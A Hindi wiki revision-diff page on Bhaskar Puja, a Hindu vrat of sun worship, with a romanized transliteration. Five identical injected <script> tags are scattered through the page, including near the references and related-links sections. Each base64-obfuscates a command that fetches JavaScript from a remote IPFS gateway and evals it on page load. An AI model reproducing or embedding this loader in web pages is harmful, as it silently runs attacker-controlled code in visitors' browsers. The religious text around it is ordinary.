Difference between revisions of "भास्कर पूजा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (भास्करपूजा का नाम बदलकर भास्कर पूजा कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*ऐसा कहा गया है कि [[सूर्य देवता|सूर्य]] को [[विष्णु]] के रूप में पूजना चाहिए।  
 
*ऐसा कहा गया है कि [[सूर्य देवता|सूर्य]] को [[विष्णु]] के रूप में पूजना चाहिए।  
 
*सूर्य विष्णु की दाहिनी आँख हैं।  
 
*सूर्य विष्णु की दाहिनी आँख हैं।  
 
*सूर्य की पूजा रथ चक्र के समान मण्डल में होनी चाहिए तथा सूर्य पर चढ़ाये गये पुष्पों को उतार लिये जाने पर पूजक के द्वारा अपनी देह पर नहीं धारण करना चाहिए।  
 
*सूर्य की पूजा रथ चक्र के समान मण्डल में होनी चाहिए तथा सूर्य पर चढ़ाये गये पुष्पों को उतार लिये जाने पर पूजक के द्वारा अपनी देह पर नहीं धारण करना चाहिए।  
*तिथितत्व<ref>तिथितत्व (36)</ref>; पुरुषार्थचिन्तामणि<ref>पुरुषार्थचिन्तामणि (104)</ref>; बृहत्संहिता<ref>बृहत्संहिता (57|31-57)</ref> में देवों की प्रतिमा बनाने की विधि दी गई है; इसके श्लोक 46-48 में वर्णित हैं, कि सूर्य का पाँव से वक्ष तक का शरीर एक अंग की रक्षा से ढँका रहना चाहिए।  
+
*तिथितत्व<ref>तिथितत्त्व (36</ref>; पुरुषार्थचिन्तामणि<ref>पुरुषार्थचिन्तामणि (104</ref>; बृहत्संहिता<ref>बृहत्संहिता (57|31-57</ref> में देवों की प्रतिमा बनाने की विधि दी गई है; इसके श्लोक 46-48 में वर्णित हैं, कि सूर्य का पाँव से वक्ष तक का शरीर एक अंग की रक्षा से ढँका रहना चाहिए।  
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:55, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • aisa kaha gaya hai ki soory ko vishnu ke roop mean poojana chahie.
  • soory vishnu ki dahini aankh haian.
  • soory ki pooja rath chakr ke saman mandal mean honi chahie tatha soory par chadhaye gaye pushpoan ko utar liye jane par poojak ke dvara apani deh par nahian dharan karana chahie.
  • tithitatv[1]; purusharthachintamani[2]; brihatsanhita[3] mean devoan ki pratima banane ki vidhi di gee hai; isake shlok 46-48 mean varnit haian, ki soory ka paanv se vaksh tak ka sharir ek aang ki raksha se dhanka rahana chahie.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. tithitattv (36
  2. purusharthachintamani (104
  3. brihatsanhita (57|31-57

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>